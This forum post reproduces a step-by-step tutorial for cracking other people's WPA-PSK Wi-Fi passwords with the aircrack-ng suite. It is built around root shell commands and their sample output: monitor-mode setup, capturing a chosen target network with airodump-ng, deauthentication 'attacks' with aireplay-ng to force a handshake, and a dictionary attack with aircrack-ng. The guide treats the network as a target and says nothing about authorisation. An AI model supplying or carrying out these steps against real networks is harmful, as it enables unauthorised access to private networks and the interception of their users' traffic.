HACKING WI-FI PASSWORD
Page 1 of 1
HACKING WI-FI PASSWORD
How To Crack Wireless Networks WPA psk/psk2
*Requirements
Linux OS ( almost any will work )
Aircrack-Ng Suite
Madwifi Driver ** search on google **
A Good Dictionary file
** If using backtrack or another live cd these things are probably already built in.
STARTING:
Alright before doing any of this make sure your network card is compatible with aircrack & madwifi! Some cards dont wake up after you put them in monitor mode.
Ok login as root and goto a terminal.
[root@localhost ~]# airmon-ngInterface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
Now just put your card in monitor mode
[root@localhost ~]# airmon-ng stop ath0Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
[root@localhost ~]# airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (monitor mode enabled)
now just
type: ifconfig ath0 up
type: iwconfig
[root@localhost ~]# iwconfig
lo no wireless extensions.eth0 no wireless extensions.
wifi0 no wireless extensions.
pan0 no wireless extensions.
: **:**:**:**:**:**
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-93 dBm Noise level=-93 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.437 GHz Access Point
CAPTURING:
ok now you have to start capturing your targets network so first open a new terminal window.
airodump-ng ath0
This shows all the networks you can capture in your area. Find the network you want to crack that is wpa protected, and copy the bssid ( mac address )
**DIRECTIONS**
airodump-ng:
-c channel that your target is on
example: airodump-ng -c 6
-w The name you want to save the capture as
example: airodump-ng -c 6 -w wpapsk
example2: /root/wpapsk-01.cap
–bssid The bssid that you want to capture ( the one you copied )
example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:**
ath0 the interface you are using
example: airodump-ng -c 6 -w wpapsk –bssid **:**:**:**:**:** ath0
**END OF DIRECTIONS**
Alright now type: airodump-ng -c XX -w whateveruwant –bssid **:**:**:**:**:** ath0
CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK BOBNET
BSSID STATION PWR Rate Lost Packets Probes
NOW WAIT untill a client connects to the network.
AIREPLAY:
Next your going to use aireplay to send attacks.
**DIRECTIONS**
aireplay-ng
xx= mine
**=targets
-0 5 This sends 5 attacks to the target
example: aireplay-ng -0 5
-a the target wireless networks bssid
example: aireplay-ng -0 5 -a **:**:**:**:**:**
-c your access point bssid ( remember iwconfig that i told you to leave open )
example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx
ath0 The interface and your ready to go!
example:
aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0
** END OF DIRECTIONS **
CRACKING:
when your airodump finally shows this:
CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK ************
BSSID STATION PWR Rate Lost Packets Probes
Then you can now crack there network!
FIRST YOU NEED A DICTIONARY FILE
make sure you know the directory its in.
**DIRECTIONS**
aircrack-ng
[the directory not a command]
example: aircrack-ng /root/w.ethenamewas-01.cap
-w The dictionary file ( the whole directory ) and then run the command!!
[root@localhost ~]#aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words
**END OF DIRECTIONS**
Once you run the command It should start cracking...
Aircrack-ng 1.0 rc1[00:00:02] 622 keys tested (303.68 k/s)
Current passphrase: abscision
Master Key : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E
2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A
Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51
83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1
51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50
71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17
EAPOL HMAC : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0
THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!
**This concludes my guide to crack wireless networks!!
Source:
http://hackingarticles.com/wpa-cracking/
Similar topics
» PASSWORD PROTECTED FORM IN VB.NET
» ABOUT THE FILE PASSWORD FOR FORUM MEMBERS
» PASSWORD PROTECT YOUR FLASH DRIVE(USB)
» HOW TO PASSWORD PROTECT YOUR HARD DISK DRIVE
» ABOUT THE FILE PASSWORD FOR FORUM MEMBERS
» PASSWORD PROTECT YOUR FLASH DRIVE(USB)
» HOW TO PASSWORD PROTECT YOUR HARD DISK DRIVE
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum